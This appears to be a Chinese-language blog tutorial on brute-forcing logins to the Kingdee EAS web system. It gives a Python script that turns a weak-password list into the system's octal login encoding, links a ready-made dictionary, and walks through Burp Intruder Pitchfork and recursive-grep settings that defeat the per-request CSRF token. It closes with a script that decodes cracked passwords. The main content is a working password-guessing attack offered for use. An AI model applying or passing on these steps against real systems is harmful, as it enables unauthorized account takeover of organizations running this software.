
可惜我不知道適用版本,當然了你進行用戶名枚舉是一樣的方法....hi✿(。◕ᴗ◕。)✿
查看編碼
抓包發現僅僅是最簡單的ascii編碼而已, 這里小小的解碼一下,氣死我了,原來是八進制,氣死我了


字典處理代碼
# python 3.9
# windows
# 如果遇到什么gbk報錯啥的,把你的字典用記事本打開另存為UTF-8即可
def write_to_file(passwd_list_):
with open("F:\\weakpass_dict\\0.7.jin_dieEAS.txt", "a") as f_:
for _ in passwd_list_:
f_.write(_ + "\n")
with open("F:\\weakpass_dict\\0.7.txt", "r") as f:
lines = f.readlines() # 全部讀到內存里去, 沒有大內存能搞好安全嗎?
number = 0
passwd_list = []
for i in lines: # 遍歷字典
passwd = ""
for j in i[:-1]: # 不要尾部的回車換行 # %2C61%2C62%2C63%2C64%2C65%2C66
passwd += "%2C" + str(oct(ord(j)))[2:] # 對每個密碼進行變換
passwd_list.append(passwd)
number += 1
if number == 1000: # 1千個密碼寫一次文件, 嗯, 考慮到文件讀寫比較慢(( • ̀ω•́ )✧)
write_to_file(passwd_list)
number = 0
passwd_list = []
write_to_file(passwd_list)
生成的字典
想要直接用的話, github也傳了一份,直接下載就好了
https://github.com/sanqiushu-ns/sanqiushu_passwd_dicts/blob/main/%E9%87%91%E8%9D%B6EAS/0.7.jin_dieEAS.txt
開始爆破
在開始爆破的時候發現竟然有CSRF token, 好吧,無傷大雅
抓到爆破包,給這四個打上標記,選Pitchfork模式, 然后記住這四個payload的順序

然后先轉到設置頁面,把線程設置為1, 然后添加三個匹配規則,對應一開始標記的4個payload的后三個

這個要添加三次,分別對應這三個地方,當然了,我們只標記雙引號里的值

然后到payload頁面,去分別設置1,2,3,4這四個payload的值
1是密碼,payload type 選Simple list ,然后load 我們用代碼生成的字典

2是it這個參數,payload type 選Recursive grep ,然后payload options點一下第一個,然后那個payload for first 要刷新一下頁面,去取一個新的(舊的用過一次就不能用了)


3,跟2一樣的
4,也差不多
開始跑吧,沒想到啊

如果你能有幸跑出密碼這里有個反編碼的小腳本
a = "%2C120%2C100%2C163%2C163%2C167%2C60%2C162%2C144"
b = a.split("%2C")[1:]
print(b)
c = ""
for i in b:
c += chr(int(i, 8))
print(c)
